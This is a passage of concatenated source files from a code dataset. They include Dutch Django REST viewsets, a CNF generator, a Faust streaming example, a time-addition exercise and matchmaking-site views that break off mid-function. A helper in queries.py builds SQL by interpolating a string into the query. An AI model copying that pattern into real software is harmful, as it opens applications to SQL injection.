specifiek CONTACTMOMENT opvragen.\n\n Een specifiek CONTACTMOMENT opvragen.\n\n update:\n Werk een CONTACTMOMENT in zijn geheel bij.\n\n Werk een CONTACTMOMENT in zijn geheel bij.\n\n partial_update:\n Werk een CONTACTMOMENT deels bij.\n\n Werk een CONTACTMOMENT deels bij.\n\n destroy:\n Verwijder een CONTACTMOMENT.\n\n Verwijder een CONTACTMOMENT.\n \"\"\"\n\n queryset = ContactMoment.objects.all()\n serializer_class = ContactMomentSerializer\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": 
SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n\nclass VerzoekViewSet(viewsets.ModelViewSet):\n \"\"\"\n Opvragen en bewerken van VERZOEKen.\n\n create:\n Maak een VERZOEK aan.\n\n Maak een VERZOEK aan.\n\n list:\n Alle VERZOEKen opvragen.\n\n Alle VERZOEKen opvragen.\n\n retrieve:\n Een specifiek VERZOEK opvragen.\n\n Een specifiek VERZOEK opvragen.\n\n update:\n Werk een VERZOEK in zijn geheel bij.\n\n Werk een VERZOEK in zijn geheel bij.\n\n partial_update:\n Werk een VERZOEK deels bij.\n\n Werk een VERZOEK deels bij.\n\n destroy:\n Verwijder een VERZOEK.\n\n Verwijder een VERZOEK.\n \"\"\"\n\n queryset = Verzoek.objects.all()\n serializer_class = VerzoekSerializer\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n\nclass ObjectContactMomentViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en verwijderen van OBJECT-CONTACTMOMENT relaties.\n\n Het betreft een relatie tussen een willekeurig OBJECT, bijvoorbeeld een\n ZAAK in de Zaken API, en een CONTACTMOMENT.\n\n create:\n Maak een OBJECT-CONTACTMOMENT relatie aan.\n\n Maak een OBJECT-CONTACTMOMENT relatie aan.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n\n list:\n Alle OBJECT-CONTACTMOMENT relaties opvragen.\n\n Alle OBJECT-CONTACTMOMENT relaties opvragen.\n\n retrieve:\n Een specifiek OBJECT-CONTACTMOMENT relatie opvragen.\n\n Een specifiek OBJECT-CONTACTMOMENT relatie opvragen.\n\n destroy:\n Verwijder een OBJECT-CONTACTMOMENT relatie.\n\n Verwijder een OBJECT-CONTACTMOMENT relatie.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n \"\"\"\n\n queryset = ObjectContactMoment.objects.all()\n serializer_class = ObjectContactMomentSerializer\n filterset_class = ObjectContactMomentFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n def perform_destroy(self, instance):\n # destroy is only allowed if the remote relation does no longer exist, so check for that\n validator = ObjectContactMomentDestroyValidator()\n\n try:\n validator(instance)\n except ValidationError as exc:\n raise ValidationError(\n {api_settings.NON_FIELD_ERRORS_KEY: exc}, code=exc.detail[0].code\n )\n else:\n super().perform_destroy(instance)\n\n\nclass ObjectVerzoekViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en verwijderen van OBJECT-VERZOEK relaties.\n\n Het betreft een relatie tussen een willekeurig OBJECT, bijvoorbeeld een\n ZAAK in de Zaken API, en een VERZOEK.\n\n create:\n Maak een OBJECT-VERZOEK relatie aan.\n\n Maak een OBJECT-VERZOEK 
relatie aan.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n\n list:\n Alle OBJECT-VERZOEK relaties opvragen.\n\n Alle OBJECT-VERZOEK relaties opvragen.\n\n retrieve:\n Een specifiek OBJECT-VERZOEK relatie opvragen.\n\n Een specifiek OBJECT-VERZOEK relatie opvragen.\n\n destroy:\n Verwijder een OBJECT-VERZOEK relatie.\n\n Verwijder een OBJECT-VERZOEK relatie.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n \"\"\"\n\n queryset = ObjectVerzoek.objects.all()\n serializer_class = ObjectVerzoekSerializer\n filterset_class = ObjectVerzoekFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n def perform_destroy(self, instance):\n # destroy is only allowed if the remote relation does no longer exist, so check for that\n validator = ObjectVerzoekDestroyValidator()\n\n try:\n validator(instance)\n except ValidationError as exc:\n raise ValidationError(\n {api_settings.NON_FIELD_ERRORS_KEY: exc}, code=exc.detail[0].code\n )\n else:\n super().perform_destroy(instance)\n\n\nclass VerzoekInformatieObjectViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en bewerken van VERZOEK-INFORMATIEOBJECT relaties.\n\n create:\n Maak een VERZOEK-INFORMATIEOBJECT relatie aan.\n\n Registreer een INFORMATIEOBJECT bij een VERZOEK. 
Er worden twee types van\n relaties met andere objecten gerealiseerd:\n\n **Er wordt gevalideerd op**\n - geldigheid `verzoek` URL\n - geldigheid `informatieobject` URL\n - de combinatie `informatieobject` en `verzoek` moet uniek zijn\n\n **Opmerkingen**\n - Bij het aanmaken wordt ook in de Documenten API de gespiegelde relatie\n aangemaakt, echter zonder de relatie-informatie.\n\n list:\n Alle VERZOEK-INFORMATIEOBJECT relaties opvragen.\n\n Deze lijst kan gefilterd wordt met query-string parameters.\n\n retrieve:\n Een specifieke VERZOEK-INFORMATIEOBJECT relatie opvragen.\n\n Een specifieke VERZOEK-INFORMATIEOBJECT relatie opvragen.\n\n update:\n Werk een VERZOEK-INFORMATIEOBJECT relatie in zijn geheel bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `informatieobject` URL en `verzoek` URL mogen niet veranderen\n\n partial_update:\n Werk een VERZOEK-INFORMATIEOBJECT relatie deels bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `informatieobject` URL en `verzoek` URL mogen niet veranderen\n\n destroy:\n Verwijder een VERZOEK-INFORMATIEOBJECT relatie.\n\n Verwijder een VERZOEK-INFORMATIEOBJECT relatie.\n \"\"\"\n\n queryset = VerzoekInformatieObject.objects.all()\n serializer_class = VerzoekInformatieObjectSerializer\n filterset_class = VerzoekInformatieObjectFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n }\n\n def get_queryset(self):\n qs = super().get_queryset()\n\n # Do not display BesluitInformatieObjecten that are marked to be deleted\n cache = caches[\"drc_sync\"]\n\n # TODO: Store cachekeys somewhere central.\n marked_vios = cache.get(\"vios_marked_for_delete\")\n if marked_vios:\n return qs.exclude(uuid__in=marked_vios)\n return qs\n\n\nclass VerzoekContactMomentViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en bewerken van VERZOEK-CONTACTMOMENT relaties.\n\n create:\n Maak een VERZOEK-CONTACTMOMENT relatie aan.\n\n Registreer een CONTACTMOMENT bij een VERZOEK. 
Er worden twee types van\n relaties met andere objecten gerealiseerd:\n\n **Er wordt gevalideerd op**\n - geldigheid `verzoek` URL\n - geldigheid `contactmoment` URL\n - de combinatie `contactmoment` en `verzoek` moet uniek zijn\n\n list:\n Alle VERZOEK-CONTACTMOMENT relaties opvragen.\n\n Deze lijst kan gefilterd wordt met query-string parameters.\n\n retrieve:\n Een specifieke VERZOEK-CONTACTMOMENT relatie opvragen.\n\n Een specifieke VERZOEK-CONTACTMOMENT relatie opvragen.\n\n update:\n Werk een VERZOEK-CONTACTMOMENT relatie in zijn geheel bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `contactmoment` URL en `verzoek` URL mogen niet veranderen\n\n partial_update:\n Werk een VERZOEK-CONTACTMOMENT relatie deels bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `contactmoment` URL en `verzoek` URL mogen niet veranderen\n\n destroy:\n Verwijder een VERZOEK-CONTACTMOMENT relatie.\n\n Verwijder een VERZOEK-CONTACTMOMENT relatie.\n \"\"\"\n\n queryset = VerzoekContactMoment.objects.all()\n serializer_class = VerzoekContactMomentSerializer\n filterset_class = VerzoekContactMomentFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n }\n\n\nclass VerzoekProductViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en bewerken van VERZOEK-PRODUCT relaties.\n\n create:\n Maak een VERZOEK-PRODUCT relatie aan.\n\n Registreer een PRODUCT bij een VERZOEK. Er worden twee types van\n relaties met andere objecten gerealiseerd:\n\n **Er wordt gevalideerd op**\n - geldigheid `verzoek` URL\n - geldigheid `product` URL\n\n list:\n Alle VERZOEK-PRODUCT relaties opvragen.\n\n Deze lijst kan gefilterd wordt met query-string parameters.\n\n retrieve:\n Een specifieke VERZOEK-PRODUCT relatie opvragen.\n\n Een specifieke VERZOEK-PRODUCT relatie opvragen.\n\n destroy:\n Verwijder een VERZOEK-PRODUCT relatie.\n\n Verwijder een VERZOEK-PRODUCT relatie.\n \"\"\"\n\n queryset = VerzoekProduct.objects.all()\n serializer_class = VerzoekProductSerializer\n filterset_class = VerzoekProductFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n }\n","repo_name":"VNG-Realisatie/klantinteracties-api","sub_path":"src/kic/api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":14999,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15092192992","text":"#!/usr/bin/env python\n\n\"\"\"StatsApp\"\"\"\n\nimport argparse\nimport sys\n\nfrom . import parser as chat_parser\n\ndef main():\n    \"\"\"Main\"\"\"\n    parser = argparse.ArgumentParser(prog='StatsApp')\n    parser.add_argument('chat', help='Chat file')\n    args = parser.parse_args()\n    chat_file = args.chat\n\n    # Load pandas dataframe\n    df = chat_parser.load_file(chat_file)\n    # print(df)\n    chat_parser.plot_messages(df)\n\nif __name__ == '__main__':\n    sys.exit(main())\n","repo_name":"llaaperi/StatsApp","sub_path":"statsapp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"551430264","text":"import numpy as np\n\nK = 3\n\n\n\ndef CreateRandomCNF(N, L, filename):\n f = open(filename, 'w')\n f.write('c The CNF file\\n')\n f.write('p cnf ' + str(int(N)) + ' ' + str(int(L)) + '\\n')\n Prop = np.array(range(N))\n\n for i in range(L):\n np.random.shuffle(Prop)\n for j in range(K):\n sign = np.random.random(1)\n if sign > 0.5:\n f.write(str(Prop[j] + 1) + ' ')\n else:\n f.write('-' + str(Prop[j] + 1) + ' ')\n f.write('0\\n')\n\n f.close()\n\n\nfor i in range(16):\n l = int(300 + 20 * i)\n print(l)\n for j in range(100):\n CreateRandomCNF(N=100, L=l, filename='CNFs/N=100/L=' + str(l) + '/' + str(j+1) + '.cnf')\n\nfor i in range(16):\n l = int(450 + 30 * i)\n print(l)\n for j in range(100):\n CreateRandomCNF(N=150, L=l, filename='CNFs/N=150/L=' + str(l) + '/' + str(j+1) + '.cnf')\n","repo_name":"lanhongjianlr/CS8803-LCS-Project-1","sub_path":"CreateRandomCNF.py","file_name":"CreateRandomCNF.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40448662852","text":"import logging\nfrom random import randint\nimport time\nfrom functools import partial\nfrom typing import AsyncIterator\n\nimport faust\nfrom faust import ChannelT, StreamT\n\napp = faust.App(\"bound_agent\")\nlogger = logging.getLogger(__name__)\n\nclass DeviceAction(faust.Record):\n device_id: str\n\nclass DeadLetter(faust.Record):\n stage: str\n record: DeviceAction\n\nasync def stage1_agent(\n dead_letters: ChannelT,\n stream: StreamT[DeviceAction]\n) -> AsyncIterator[DeviceAction]:\n async for action in stream:\n now_ts = int(time.time())\n try:\n if now_ts % 3 == 0:\n raise Exception(\"!!!\")\n \n logger.info(f\"[stage1] action arrived: {action}\")\n yield action\n except:\n await dead_letters.send(value=DeadLetter(stage=\"stage1\", record=action))\n\nasync def stage2_agent(\n dead_letters: ChannelT,\n stream: StreamT[DeviceAction]\n) -> AsyncIterator[DeviceAction]:\n async for action in stream:\n now_ts = int(time.time())\n try:\n if now_ts % 3 == 1:\n raise Exception(\"!!!\")\n\n logger.info(f\"[stage2] action arrived: {action}\")\n yield action\n except:\n await dead_letters.send(value=DeadLetter(stage=\"stage2\", record=action))\n\nasync def deadletter_agent(stream: StreamT[DeviceAction]) -> AsyncIterator[DeviceAction]:\n async for dl in stream:\n logger.error(f\"[dead letter] arrived: {dl}\")\n yield dl\n\nasync def action_generator(device_actions: ChannelT):\n for i in range(0, randint(3, 101)):\n await device_actions.send(value=DeviceAction(device_id=i))\n \n\ndef main():\n channel_device_action = app.channel(value_type=DeviceAction)\n channel_stage1_stage2 = app.channel(value_type=DeviceAction)\n channel_deadletter = app.channel(value_type=DeadLetter)\n\n app.timer(interval=3, on_leader=True)(partial(action_generator, channel_device_action))\n app.agent(channel_deadletter, name=\"dead-letter-agent\")(deadletter_agent)\n\n app.agent(channel_device_action, name=\"stage1-agent\", sink=[channel_stage1_stage2])(\n partial(stage1_agent, channel_deadletter)\n )\n app.agent(channel_stage1_stage2, name=\"stage2-agent\")(\n partial(stage2_agent, channel_deadletter)\n )\n\n app.main()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"faust-streaming/faust","sub_path":"examples/bound_agent.py","file_name":"bound_agent.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":1280,"dataset":"github-code","pt":"69"}
+{"seq_id":"21942649260","text":"# Write a function named add_time that takes in two required parameters and one optional parameter:\nfrom typing import Union, Any\n\n\n# a start time in the 12-hour clock format (ending in AM or PM)\n# a duration time that indicates the number of hours and minutes\n# (optional) a starting day of the week, case insensitive\n# The function should add the duration time to the start time and return the result.\n\n# If the result will be the next day, it should show (next day) after the time. \n# If the result will be more than one day later, it should show (n days later) after the time,\n# where \"n\" is the number of days later.\n\n# If the function is given the optional starting day of the week parameter, then the output \n# should display the day of the week of the result. The day of the week in the output should\n# appear after the time and before the number of days later.\n\n# Below are some examples of different cases the function should handle. Pay close attention \n# to the spacing and punctuation of the results.\n# /////////////////////////////////////////////////////////////////////////////////\ndef add_time(start_time, duration, day=None):\n new_time = \"\"\n # split the time string i.e \"02:30 AM\"\n startTime = start_time\n startTime = startTime.split(\" \") # this will split the string where it encounters a white space\n startTimeMeridian = startTime[1] # assigning the meridian time AMPM\n startTimeFirstElement = startTime[0]\n startTime = startTimeFirstElement.split(\":\")\n startTimeHour = int(startTime[0])\n startTimeMinutes = int(startTime[1])\n\n # converting start time to 24 hours format\n if startTimeMeridian == \"PM\":\n startTimeHour = startTimeHour + 12\n\n # splitting Duration string\n duration = duration\n duration = duration.split(\":\")\n durationHour = int(duration[0])\n durationMinutes = int(duration[1])\n\n # converting startTime to minutes\n # converting hours to minutes\n startTimeInMinutes = int(startTimeMinutes) + (startTimeHour * 60)\n\n # converting duration to minutes\n durationInMinutes = durationMinutes + (durationHour * 60)\n\n totalMinutes = int(startTimeInMinutes) + int(durationInMinutes)\n\n # calculating the total hours\n hours = int(totalMinutes) / 60\n # calculating the total minutes\n minutes = int(totalMinutes) % 60\n\n # concatenating zero to the minutes if minutes is less than 10\n if len(str(minutes)) < 2:\n new_time = \"0\" + str(minutes)\n else:\n new_time = minutes\n\n # calculating days\n # there are 24 hours per day the total number of hours divided by 24 gives us the total number of days\n days = int(hours / 24)\n # the modulus gives us the number of hours left\n # this basically converts the hours to a 24-hour time format\n # answer will always be less than 24\n hour = hours % 24\n\n # getting the final time in 12-hour format and meridian\n # this converts the 24-hour time format to a 12-hour format\n # the answer will never be greater than 12\n finalHours = int(hour % 12)\n # if hour is 0 then\n # hour will be zero if is less than an hour i.e 00:20 AM, 00:5 = 25min\n # so hours = 26 / 60 = 0 hours\n # now hour = 0 % 24 = 0\n if int(hour / 12) == 0: # hour is in 24-hour time format so if hour is less than 12 it means the meridian is \"AM\"\n # so when hour is divided by 12 it will return 0 because the numerator (hour) is less than the denominator (12)\n finalMeridian = \"AM\"\n if finalHours == 0: # # this is to distinguish between 12 AM and 12 PM\n finalHours = 12\n else: # if hour is greater than 12 
(hour / 12) will return a number greater than 0 meaning it's \"PM\"\n        finalMeridian = \"PM\"\n        if finalHours == 0: # this is to distinguish between 12 AM and 12 PM\n            finalHours = 12\n\n    new_time = str(finalHours) + \":\" + str(new_time) + \" \" + finalMeridian\n    if day is not None:\n        dayz = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n        # initializing pos variable\n        pos = 0\n        while True:\n            # will break when given day matches any element in the dayz list\n            if day.lower() == dayz[pos].lower():\n                break\n            # pos will increment until the if statement executes\n            pos = pos + 1\n        # advance the weekday index by the number of elapsed days, wrapping around the 7-day week\n        newDay = dayz[((pos + (days % 7)) % 7)]\n        new_time = new_time + \", \" + newDay\n\n    # output\n    if days == 1:\n        new_time = new_time + \" (next day)\"\n    if days > 1:\n        days = str(days)\n        new_time = new_time + \" (\" + days + \" days later)\"\n\n    return new_time\n\nprint(add_time(\"11:02 PM\", \"30:01\", \"Monday\"))","repo_name":"mmveliso/freecodecamp_projects","sub_path":"add_time/add_time.py","file_name":"add_time.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10710027025","text":"def select_properties_query(allowed_statuses):\n \"\"\"\n function to return query based on allowed\n statuses\n \"\"\"\n query = (\n \"SELECT p.address, p.city, p.price, p.description \"\n \"FROM habi_db.status_history as sh \"\n \"JOIN habi_db.property as p on p.id = sh.property_id \"\n \"JOIN habi_db.status as s on s.id = sh.status_id\"\n \" WHERE s.name \"\n f\"IN ({allowed_statuses})\"\n )\n return query\n","repo_name":"Lawlet2/tuhabi_test","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23870725473","text":"from django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom account.models import Profile, ProfileImage, Account, Preference\nfrom account.forms import ProfileCreationForm\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nimport json\n# Create your views here.\n\n#View for About Us page\ndef about_us(request):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/about_us.html', context)\n\n#View for Privacy Policy page\ndef privacy_policy(request):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\tprofile_image = ProfileImage.objects.get(profile=profile)\n\tcontext = {\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/privacy_policy.html', context)\n\ndef privacy_policy_external(request):\n\treturn render(request, 'mainApp/privacy_policy_external.html', {})\n\ndef home(request):\n\tsystem_messages = messages.get_messages(request)\n\tfor message in system_messages:\n\t\tpass\n\tsystem_messages.used = True\n\tuser = request.user\n\tif request.user.is_superuser:\n\t\treturn redirect('admin/')\n\tif request.user.is_authenticated:\n\t\tif Profile.objects.filter(user=request.user).count():\n\t\t\treturn redirect('feed')\n\t\telse:\n\t\t\treturn redirect('createProfile')\n\telse:\n\t\tif request.POST:\n\t\t\tuserinput = request.POST['email']\n\t\t\temail = ''\n\t\t\tpassword = request.POST['password']\n\t\t\ttry:\n\t\t\t\temail = Account.objects.get(username=userinput).email.lower()\n\t\t\texcept Account.DoesNotExist:\n\t\t\t\temail = request.POST['email'].lower()\n\t\t\tuser = authenticate(email = email, password = password)\n\t\t\tif user:\n\t\t\t\tlogin(request, user)\n\t\t\t\tif Profile.objects.filter(user=request.user).count():\n\t\t\t\t\treturn redirect('feed')\n\t\t\t\telse:\n\t\t\t\t\treturn redirect('createProfile')\n\t\t\telse:\n\t\t\t\tmessages.error(request, 'User does not exist, please register now')\t\t\n\n\treturn render(request, 'mainApp/home.html', {})\n\ndef feed(request):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tpreference = Preference.objects.get(profile=profile)\n\texcept Preference.DoesNotExist:\n\t\tpreference = ''\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tif preference:\n\t\tmin_age = preference.age[:2]\n\t\tmax_age = preference.age[3:]\n\t\tmin_height = preference.height[:3]\n\t\tmax_height = preference.height[4:]\n\t\tsalary = preference.salary\n\t\tif salary == '<5 LPA':\n\t\t\tmin_salary = 0\n\t\t\tmax_salary = 5\n\t\telif salary == '5-10 LPA':\n\t\t\tmin_salary = 5\n\t\t\tmax_salary = 10\n\t\telif salary == '10-15 LPA':\n\t\t\tmin_salary = 10\n\t\t\tmax_salary = 15\n\t\telse:\n\t\t\tmin_salary = 15\n\t\t\tmax_salary = 1000000\n\t\teducation = preference.education.split(',')[1:]\n\t\tcomplexion = preference.complexion.split(',')[1:]\n\t\tprint(education, 
complexion)\n\t\tmarried = preference.married\n\t\tif profile.user.gender == 'M':\n\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\tuser__gender = 'F',\n\t\t\t\tuser__is_active=True,\n\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\teducation__in = education,\n\t\t\t\tcomplexion__in = complexion,\n\t\t\t\tmarital_status = married,\n\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\tuser__gender = 'M', \n\t\t\t\tuser__is_active=True,\n\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\teducation__in = education,\n\t\t\t\tcomplexion__in = complexion,\n\t\t\t\tmarital_status = married,\n\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\telse:\n\t\tif profile.user.gender == 'M':\n\t\t\tget_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tget_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\teducation = ''\n\t\tcomplexion = ''\n\tpage = request.GET.get('page', 1)\n\tpaginator = Paginator(get_profiles, 10)\n\ttry:\n\t\tshow_profiles = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tshow_profiles = paginator.page(1)\n\texcept EmptyPage:\n\t\tshow_profiles = paginator.page(paginator.num_pages)\n\t\n\tcontext = {\n\t\t'profile' : profile,\n\t\t'profile_image' : profile_image,\n\t\t'show_profiles' : show_profiles,\n\t\t'latest_profiles' : latest_profiles,\n\t\t'preference'\t: preference,\n\t\t'education'\t\t: education,\n\t\t'complexion'\t: complexion\n\t}\n\n\tprint(context)\n\treturn render(request, 'mainApp/feed.html', context )\n\ndef sort_by(request, key, value):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tpreference = Preference.objects.get(profile=profile)\n\texcept Preference.DoesNotExist:\n\t\tpreference = ''\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tif preference:\n\t\tmin_age = preference.age[:2]\n\t\tmax_age = preference.age[3:]\n\t\tmin_height = preference.height[:3]\n\t\tmax_height = preference.height[4:]\n\t\tsalary = preference.salary\n\t\tif salary == 'Below 5 LPA':\n\t\t\tmin_salary = 0\n\t\t\tmax_salary = 5\n\t\telif salary == '5-10 LPA':\n\t\t\tmin_salary = 5\n\t\t\tmax_salary = 10\n\t\telif salary == '10-15 LPA':\n\t\t\tmin_salary = 10\n\t\t\tmax_salary = 15\n\t\telse:\n\t\t\tmin_salary = 15\n\t\t\tmax_salary = 200000000\n\t\teducation = preference.education.split(',')[1:]\n\t\tcomplexion = preference.complexion.split(',')[1:]\n\t\tmarried = preference.married\n\t\tif profile.user.gender == 'M' :\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'F', \n\t\t\t\t\trasi = value, \n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, 
